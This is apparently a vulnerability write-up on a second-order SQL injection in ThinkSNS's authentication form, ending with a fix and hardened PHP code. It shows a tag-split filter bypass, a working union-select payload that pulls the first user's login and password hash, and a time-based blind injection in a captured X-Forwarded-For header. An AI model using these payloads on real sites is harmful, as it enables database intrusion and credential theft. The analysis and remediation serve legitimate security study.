ThinkSNS second-order SQL injection: bypassing the anti-injection filter

Source: Internet
Author: User

Part 1: Vulnerability Analysis

File: /apps/public/Lib/Action/AccountAction.class.php

/**
 * Submit the application for authentication
 * @return void
 */
public function doAuthenticate() {
    $verifyInfo = D('user_verified')->where('uid='.$this->mid)->find();
    $data['usergroup_id'] = intval($_POST['usergroup_id']);
    if (!$data['usergroup_id']) $data['usergroup_id'] = 5;
    $data['company']  = t($_POST['company']);
    $data['realname'] = t($_POST['realname']);
    $data['idcard']   = t($_POST['idcard']);
    $data['phone']    = t($_POST['phone']);
    $data['reason']   = t($_POST['reason']);
    // $data['info'] = t($_POST['info']);
    $data['attach_ids'] = t($_POST['attach_ids']); // attach_ids filter: only t(), no integer check
    if (D('user_verified_category')->where('pid='.$data['usergroup_id'])->find()) {
        $data['user_verified_category_id'] = intval($_POST['verifiedCategory']);
    } else {
        $data['user_verified_category_id'] = 0;
    }
    $Regx1 = '/^[0-9]*$/';
    $Regx2 = '/^[A-Za-z0-9]*$/';
    $Regx3 = '/^[A-Za-z|\x{4e00}-\x{9fa5}]+$/u';
    // ......
    preg_match_all('/./us', $data['reason'], $matchs); // a Chinese character also counts as one character
    if (count($matchs[0]) > 140) {
        // $this->error('authentication reason cannot exceed 140 characters');
        echo 'authentication reason cannot exceed 140 characters';
        exit;
    }
    // preg_match_all('/./us', $data['info'], $match); // a Chinese character also counts as one character
    // if (count($match[0]) > 140) {
    //     $this->error('the authentication material cannot exceed 140 characters');
    // }
    if ($verifyInfo) {
        $data['verified'] = 0;
        $res = D('user_verified')->where('uid='.$verifyInfo['uid'])->save($data); // data enters the database
    } else {
        $data['uid'] = $this->mid;
        $res = D('user_verified')->add($data);
    }
    if ($res) {
        // echo '1';
        // model name is garbled in the extracted text; 'Notify' is assumed here
        model('Notify')->sendNotify($this->mid, 'public_account_doAuthenticate');
        $touid = D('user_group_link')->where('user_group_id=1')->field('uid')->findAll();
        foreach ($touid as $k => $v) {
            model('Notify')->sendNotify($v['uid'], 'verify_audit');
        }
        // return $this->ajaxReturn(null, 'application successful, please wait for review', 1);
        echo '1';
    } else {
        // $this->error("application failed");
        echo 'application failed';
        exit;
    }
}



At this point attach_ids has already been written to the database, passed through t() but never checked to be a list of integers.

Next, look at where the stored value is read back out (same file):

/**
 * Apply for authentication
 * @return void
 */
public function authenticate() {
    $auType = model('usergroup')->where('is_authenticate=1')->findall();
    $this->assign('autype', $auType);
    $verifyInfo = D('user_verified')->where('uid='.$this->mid)->find();
    if ($verifyInfo['attach_ids']) {
        $a = explode('|', $verifyInfo['attach_ids']);
        foreach ($a as $key => $val) {
            if ($val != "") {
                $attachInfo = D('Attach')->where("attach_id=$a[$key]")->find(); // attach_id is spliced straight into the query
                $verifyInfo['attachment'] .= $attachInfo['name'].'&nbsp;<a href="'.getImageUrl($attachInfo['save_path'].$attachInfo['save_name']).'" target="_blank">download</a><br/>';
            }
        }
    }
    // ......
}



After attach_ids is read back from the database, it is split on | and each piece is concatenated directly into a second query.

There is no quoting and no integer cast around the value, so this is SQL injection.

Because the data is stored first and only becomes dangerous when it is reused, any malicious value that gets into attach_ids is triggered on the second use (a second-order injection).



Part 2: Bypass Analysis

The remaining question is whether the t() function can be bypassed.

/core/OpenSociax/functions.inc.php

/**
 * The t function filters tags and outputs clean text without html
 * @param string text content
 * @return string processed content
 */
function t($text) {
    $text = nl2br($text);
    $text = real_strip_tags($text);
    $text = addslashes($text);
    $text = trim($text);
    return $text;
}



Here is the real_strip_tags function:

function real_strip_tags($str, $allowable_tags = "") {
    $str = html_entity_decode($str, ENT_QUOTES, 'UTF-8');
    return strip_tags($str, $allowable_tags);
}



Here the HTML tags are stripped out.

In summary, when a malicious SQL statement passes through t(), the HTML tags are stripped first and only then is addslashes applied.

So HTML tags inserted inside SQL keywords bypass the global defense: the keyword is never seen as a keyword by the filter, yet comes out whole.

For example, select is written as se<a>lect; this passes the global filter and, after strip_tags, becomes select again.

1. Log in to the front end and apply for authentication under Personal Information:

http://localhost/thinksns/index.php?app=public&mod=Account&act=Authenticate



2. When submitting the form, capture the request and change attach_ids:

attach_ids=%7C76%7C-1 un<a>ion se<a>lect 1,2,3,4,5,6,7,(se<a>lect co<a>ncat(login,0x23,password) fr<a>om ts_user li<a>mit 1),9,10,11,12,13,14,15,16,17,18,19,20#%7C



The captured request (request line not included in the original capture):

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/thinksns/index.php?app=public&mod=Account&act=authenticate
Content-Length: 156
Cookie: CNZZDATA80862620=cnzz_eid%3D1277534265-1407229558-%26ntime%3D1411435759; bdshare_firstime=1407229707189; pgv_pvi=3674949632; cuz_auth=W25fXgRlUGYBbgdpB28EYFoyAmVSDgJnAg0CZgNjUT5VYQo7VzZXNFBmU2UBYQVhAj5SNFRiUTVXMAFkCGhUYFtpX2cENlBgATMHYgczBDVaNwIyUjcCYwI0Al8DMQ; cuz_userid=1; cuz_username=admin123; cej_username=admin123; cej_auth=fhtuNEBwVjcReA5jMQgdKnEVeklmPnVMWFpWYGMOA2RgBAJoVGReahoqJxI7Cg45R3dCcAw%2BX2dmDHVCVzooFH4cbg1AI1YxESUOaDFUHX9xEHoeZgd1SFhjVlljXA; cej_userid=1; PHPSESSID=2b74f139fdd6ec4d629fc2bce0a85e95; CNZZDATA1702264=cnzz_eid%3D2084647819-1413523648-http%253A%252F%252Flocalhost%252F%26ntime%3D1413523648; T3_online_update=1413552570; T3_TSV3_LOGGED_USER=fb8DZUmtTTQ17neIIPi6M7u8bJccMAEj
X-Forwarded-For: 127.0.0.1',`email`=(if(mid(user(),1,1)=char(114),sleep(3),0))#
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

usergroup_id=&company=&realname=%E5%95%8A%E5%95%8A%E5%95%8A&idcard=111111111111111111&phone=13111111111&reason=111111&verifiedCategory=1&attach_ids=%7C76%7C-1 un<a>ion se<a>lect 1,2,3,4,5,6,7,(se<a>lect co<a>ncat(login,0x23,password) fr<a>om ts_user li<a>mit 1),9,10,11,12,13,14,15,16,17,18,19,20#%7C



3. Go back to step 1 and open:

http://localhost/thinksns/index.php?app=public&mod=Account&act=Authenticate



The administrator account information is displayed in the authentication attachment list (screenshot in the original, not reproduced here).





Given the right conditions, the same injection point can also be escalated to getshell.

Solution:

1. Protect the values used after the where clause (cast attach ids to integers or let the framework quote them) instead of splicing them in.

2. Correct the defense logic: t() is an HTML filter, and stripping tags before addslashes cannot be relied on to stop SQL.
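As an added example (my own code, not ThinkSNS's), here is a hardened treatment of attach_ids covering both points of the solution: on the write path the submitted value is reduced to a canonical list of positive integers before it is stored, and on the read path the stored value is re-validated and the lookup condition is built as an array so that the framework, not string concatenation, handles the value. The helper names are mine; the only framework assumption is a ThinkPHP-style where() that accepts an array condition, which the real action would call in place of the string "attach_id=$a[$key]".

```php
<?php
// Added example, not ThinkSNS code. Runs stand-alone: php fix_example.php

/**
 * Canonicalise a submitted attach_ids string such as "|76|12|" so that only
 * positive integers survive. Anything else (signs, spaces, tags, SQL) is
 * dropped before the value is stored, so no second-order payload reaches the DB.
 */
function normalize_attach_ids(string $raw, int $maxCount = 20): string
{
    $ids = [];
    foreach (explode('|', $raw) as $piece) {
        $piece = trim($piece);
        // ctype_digit accepts only [0-9]+: no sign, no whitespace, no "<a>".
        if ($piece === '' || !ctype_digit($piece) || (int)$piece === 0) {
            continue;
        }
        $ids[(int)$piece] = true;            // keyed array dedupes for free
        if (count($ids) >= $maxCount) {
            break;
        }
    }
    $list = array_keys($ids);
    return $list === [] ? '' : '|' . implode('|', $list) . '|';
}

/**
 * Parse a stored attach_ids value back into integers. The read side must not
 * trust the database either (rows written before the fix may still hold junk),
 * so the same rule is applied again instead of splicing $a[$key] into SQL.
 */
function stored_attach_ids(string $stored): array
{
    $out = [];
    foreach (explode('|', $stored) as $piece) {
        if ($piece !== '' && ctype_digit($piece) && (int)$piece > 0) {
            $out[] = (int)$piece;
        }
    }
    return $out;
}

/**
 * Lookup condition for one attachment, in the array form a ThinkPHP-style
 * where() quotes itself (assumption about the framework, stated in the lead-in).
 * The type hint guarantees an integer ever reaches the query.
 */
function attach_condition(int $attachId): array
{
    return ['attach_id' => $attachId];
}

// --- constructed demonstration -------------------------------------------
// Constructed inputs: an ordinary submission and the tag-split payload shape
// discussed in this write-up. Both collapse to plain integer ids.
$normal  = '|76|12|';
$hostile = '|76|-1 un<a>ion se<a>lect 1,2,3#|';

assert(normalize_attach_ids($normal)  === '|76|12|');
assert(normalize_attach_ids($hostile) === '|76|');
assert(stored_attach_ids('|76|-1 union select 1|') === [76]);

foreach (stored_attach_ids(normalize_attach_ids($hostile)) as $id) {
    // In the real action: D('Attach')->where(attach_condition($id))->find()
    echo 'lookup condition: ', json_encode(attach_condition($id)), PHP_EOL;
}
```

The design point is that validation happens twice, once at the boundary and once at the point of use, so the fix does not depend on every existing row being clean; the HTML filter t() is left to do its own job (output sanitisation) and is no longer the only thing standing between the form field and the query.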
